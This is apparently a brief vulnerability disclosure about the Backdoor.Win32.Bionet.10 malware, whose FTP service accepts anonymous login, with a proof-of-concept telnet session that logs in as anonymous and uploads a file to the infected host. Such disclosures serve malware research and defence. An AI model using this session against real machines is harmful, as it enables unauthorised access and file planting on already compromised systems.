Backdoor.Win32.Bionet.10 Anonymous Login

Backdoor.Win32.Bionet.10 malware has an ftp service that allows for anonymous login.

Exploit/PoC:

TELNET x.x.x.x 12348

220 BNFTP Server ready.                                                                                           
USER anonymous                                                                                                    
331 Password required for anonymous.                                                                              
PASS anonymous                                                                                                    
230 User anonymous logged in.                                                                                                                                                                          
PASV                                                                                                              
227 Entering Passive Mode (192,168,1,10,194,160).                                                               
STOR 1.js                                                                                                         
150 Opening data connection for 1.js.                                                                             
PASV                                                                                                              
226 File received ok                                                                                              
227 Entering Passive Mode (192,168,1,10,194,162).

Exploit

Anonymous Login

VSCode install on kali Next